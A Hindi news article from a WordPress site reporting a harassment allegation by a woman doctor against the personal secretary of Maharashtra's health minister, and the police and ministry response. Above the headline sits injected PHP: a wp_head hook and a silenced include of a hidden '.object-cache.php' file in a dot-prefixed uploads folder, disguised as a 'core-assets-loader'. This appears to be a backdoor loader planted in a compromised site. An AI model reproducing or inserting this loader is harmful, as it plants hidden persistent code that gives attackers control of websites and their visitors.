add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); महाराष्ट्र के स्वास्थ्य मंत्री के सेक्रेटरी पर लगा छेड़खानी का आरोप – SOCH INDIA
Menu

अपराध समाचार
महाराष्ट्र के स्वास्थ्य मंत्री के सेक्रेटरी पर लगा छेड़खानी का आरोप

nobanner

महाराष्ट्र। महाराष्ट्र के स्वास्थ मंत्री दीपक सावंत के पर्सनल सेक्रेटरी पर एक महिला डॉक्टर ने छेड़खानी करने का गंभीर आरोप लगा है। जलगांव में रहने वाली पीड़िता 27 साल की महिला डॉक्टर ने मुंबई पुलिस में अपना बयान दर्ज करा दिया है।

आरोप है कि हाई प्रोफाइल मामला होने की वजह से पुलिस ने पीड़िता का बयान तो दर्ज कर लिया लेकिन आरोपी के खिलाफ मामला दर्ज नहीं किया। कार्रवाई के नाम पर पुलिस ने एफआईआर तक दर्ज नहीं की है।

जलगांव में रहने वाली इस महिला डॉक्टर का आरोप है कि वह इसी साल मार्च में एक प्रोजेक्ट लेकर मंत्री जी के पास गई थी। एंटी चैंबर में सावंत के पर्सनल सेक्रेटरी सुनील माली ने प्रोजेक्ट देखा और कहा कि किसी को गॉड फादर बनाओ तभी मंत्री जी खुश होंगे। इसके बाद उसने अश्लील बातें शुरू कर दी

पीड़िता ने बताया कि तीन पहले मार्च से अधिवेशन चल रहा था, तभी मैं मंत्री जी से मिली थी, मिलने के बाद उनके पर्सनल सेक्रेटरी ने मुझे एंटी चैंबर में बुलाया और गॉड फादर बनाने के लिए कहा, मैं काफी ज्यादा डर गई। उसके बाद वो मेरे बारे में काफी ज्यादा प्राईवेट बाते करने लगे।

तीन महीने बाद हिम्मत कर महिला डॉक्टर मरीन ड्राइव थाने पहुंची और शिकायत की। पुलिस ने शिकायत तो ले ली लेकिन जांच से पहले एफआईआर दर्ज करने से इनकार कर दिया। मरीन ड्राईव पुलिस स्टेशन के सीनियर पीआई पी.आर यादव ने कहा कि हमने महिला का स्टेटमेंट लिया है, उसने एक पर्सनल सेक्रेटरी पर आरोप लगाया है, पर यह पूरा मामला तीन महीने पुराना है, हम जांच कर के ही इस मामले FIR दर्ज करेगें।

इस मामले के तूल पकड़ने के बाद स्वास्थ्य मंत्री ने आरोपी पर्सनल सेक्रेटरी को छुट्टी पर भेज दिया है। मंत्री सावंत ने बिना भेदभाव के मामले की जांच का भरोसा दिया। स्वास्थ्य मंत्रालय ने एक जांच कमेटी का ऐलान भी कर दिया है। इसके अलावा सावंत ने मुख्यमंत्री फडणवीस से मिलकर सफाई दी है लेकिन मामले की संवेदनशीलता को देखते हुए जल्द ही जांच समिति का ऐलान होने की संभावना जताई जा रही है।